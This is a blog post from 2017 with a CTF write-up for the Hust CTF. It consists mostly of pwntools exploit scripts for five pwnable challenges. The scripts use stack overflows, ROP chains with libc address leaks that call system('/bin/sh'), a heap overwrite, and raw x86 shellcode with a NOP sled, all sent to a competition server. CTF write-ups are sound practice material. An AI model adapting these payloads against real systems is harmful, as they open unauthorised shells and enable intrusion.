2017 Hust CTF write up
0x0400 : Wargame/0x0410 : CTF1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | from pwn import * import sys elf = ELF("./attackme") #libc = ELF("libc-2.23.so") pop3ret = 0x80485f9 pop2ret = 0x80485fa if sys.argv[1] == "1": s = remote("223.194.105.182", 37100) elif sys.argv[1] == "0": s = process("./attackme") def leak(): s.recvuntil("Press any thing\n") pay = "A"*104 pay += p32(elf.plt['write']) pay += p32(pop3ret) pay += p32(1) pay += p32(elf.got['write']) pay += p32(4) pay += p32(0x0804852B) pay += p32(0) s.sendline(pay) s.recv(113) write_add = u32(s.recv(4)) s.recvuntil("Press any thing\n") sh_add = write_add + 0x85E3B system_add = write_add - 0x9AC50 log.info("write_add : "+hex(write_add)) log.info("sh_add : "+hex(sh_add)) log.info("system_add : "+hex(system_add)) pay1 = "A"*104 pay1 += p32(system_add) pay1 += p32(0) pay1 += p32(sh_add) s.sendline(pay1) s.interactive() if __name__ == '__main__': leak() | cs |
pwnable - RR2L(50p)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | from pwn import * import sys if sys.argv[1] == "1": s = remote("223.194.105.182", 22901) elif sys.argv[1] == "0": s = process("./wind") def start(): log.info("Wind Start func!") #s.recv(1024) s.recvuntil("[+] INPUT: ") pay = "A"*32 pay += p32(0x080487F9) s.sendline(pay) if __name__ == '__main__': start() s.interactive() | cs |
pwnable - Wind(100p)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | from pwn import * #s = process('./challenge') s = remote('223.194.105.182', 29001) elf = ELF("./challenge") payload = 'A'*200 #payload += p32(0x08048980) s.sendline(payload) s.recv(1024) pay1 = "A"*204 pay1 += p32(0) pay1 += p32(0x00020f31) pay1 += "B"*192 pay1 += p32(0x08048986) s.sendline(pay1) s.interactive() | cs |
pwnable - heap(100p)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | from pwn import * import time s = remote('223.194.105.182', 41001) s.recv(1024) payload = 'A'*24 + p32(0x080483e3) + p32(0x0804a00c) s.sendline(payload) leaked = u32(s.recv(4)) - 0x18540 system_libc = leaked + 0x3ada0 binsh = leaked + 0x15b82b payload_1 = 'A'*24 + p32(0x08048296)*4 + p32(system_libc) + 'AAAA' + p32(binsh) s.sendline(payload_1) s.interactive() | cs |
pwnable - ohmybof(100p)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | from pwn import * #s = process("./earth") s = remote("223.194.105.182", 22900) shellcode = "\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d\x6f\x49\x90\x03\x40\xee\x03\xa8\xbe\x96\xaf\x31\xd9\x56\x67\xe1\xac\xb6\x4a\x85\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" payload = "A" * 0x6c payload += "BBBB" payload += p32(0xbfffec3c + 200) payload += "\x90" * 2000 payload += shellcode s.sendline(payload) s.interactive() | cs |
pwnable - earth(100p)
pwnable - shellwedance(300p)
// 그냥 인젝션 문제
misc 한문제를 또 봤는데 그건 그냥 import OS 되서 패스,,,,샌드박스 문제인데 필터링이 없다.
200점 짜리 ROP인가..무튼 너무 파일이 더러웠따,,,,공부하다가 stripped 라는 것도 알게되서 한번 관련 문제 리버싱인거 같지만 봐야될듯.
'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글
| samsung ctf - write up (0) | 2017.07.10 |
|---|---|
| Security Fest 2017 CTF (0) | 2017.06.06 |
| defcon2016 - [rev]baby-re (0) | 2017.05.21 |
| RCTF - [misc]intoU (0) | 2017.05.21 |
| DEFCON_2017 - SmashMe (0) | 2017.05.08 |
